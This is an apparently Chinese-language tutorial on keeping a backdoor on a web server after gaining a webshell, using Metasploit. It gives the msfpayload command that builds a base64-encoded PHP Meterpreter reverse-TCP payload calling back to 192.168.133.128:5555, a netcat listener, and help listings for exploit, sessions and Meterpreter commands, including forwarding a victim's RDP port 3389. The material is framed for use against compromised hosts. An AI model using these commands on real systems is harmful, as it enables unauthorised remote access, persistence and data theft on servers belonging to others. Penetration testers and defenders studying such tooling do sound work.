1、前期--
情景就是當我們獲得webshell時,我們想留下我們的后門,這個時候我們可以用到msfpayload與msfconsole結合使用
啟動PostgreSQL服務:service postgresql start
啟動metasploit服務:service metasploit start
啟動msfconsole:msfconsole
查看數據庫連接狀態:db_status
生成后門文件
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php
exp.php需要加上<?php ?>
攻擊端啟動監聽
或者
nc 192.168.133.128 -lvp 5555
然后去訪問我們的后門文件
2、大家想保存我們得到的session怎么辦?首先必須連接數據庫
exploit -h -e <opt> The payload encoder to use. If none is specified, ENCODER is used. 有效負載編碼,默認使用 -f Force the exploit to run regardless of the value of MinimumRank. -h Help banner. -j Run in the context of a job. 在后台中運行 -n <opt> The NOP generator to use. If none is specified, NOP is used. -o <opt> A comma separated list of options in VAR=VAL format. -p <opt> The payload to use. If none is specified, PAYLOAD is used. -t <opt> The target index to use. If none is specified, TARGET is used. -z Do not interact with the session after successful exploitation 建立會話放到后台
sessions -h -K Terminate all sessions 殺死所有sessions -c <opt> Run a command on the session given with -i, or all 執行一個命令 -d <opt> Detach an interactive session -h Help banner -i <opt> Interact with the supplied session ID 連接會話 -k <opt> Terminate sessions by session ID and/or range -l List all active sessions -q Quiet mode -r Reset the ring buffer for the session given with -i, or all -s <opt> Run a script on the session given with -i, or all -t <opt> Set a response timeout (default: 15) -u <opt> Upgrade a shell to a meterpreter session on many platforms -v List verbose fields
3、meterpreter使用
Core Commands 代碼命令 ============= Command Description ------- ----------- ? Help menu 查看幫助 background Backgrounds the current session 將sessions保存到后台 bgkill Kills a background meterpreter script 殺死后台meterpreter腳本 bglist Lists running background scripts 列出后台meterpreter腳本 bgrun Executes a meterpreter script as a background thread 在后台進程中執行一個腳本 channel Displays information about active channels 顯示活動的通道 close Closes a channel 關閉通道 disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session 退出 help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode 開啟ruby終端 load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands 文件命令 ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands 網絡命令 =========================== Command Description ------- ----------- portfwd Forward a local port to a remote service 端口轉發
portfwd add -l 5555 -p 3389 -r 192.168.198.129 將192.168.198.129的3389端口轉發到本地的5555端口 Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command 執行命令 getenv Get one or more environment variable values getpid Get the current process identifier getuid Get the user that the server is running as kill Terminate a process ps List running processes shell Drop into a system command shell 生成一個shell sysinfo Gets information about the remote system, such as OS 查看系統信息
附上:初探meterpreter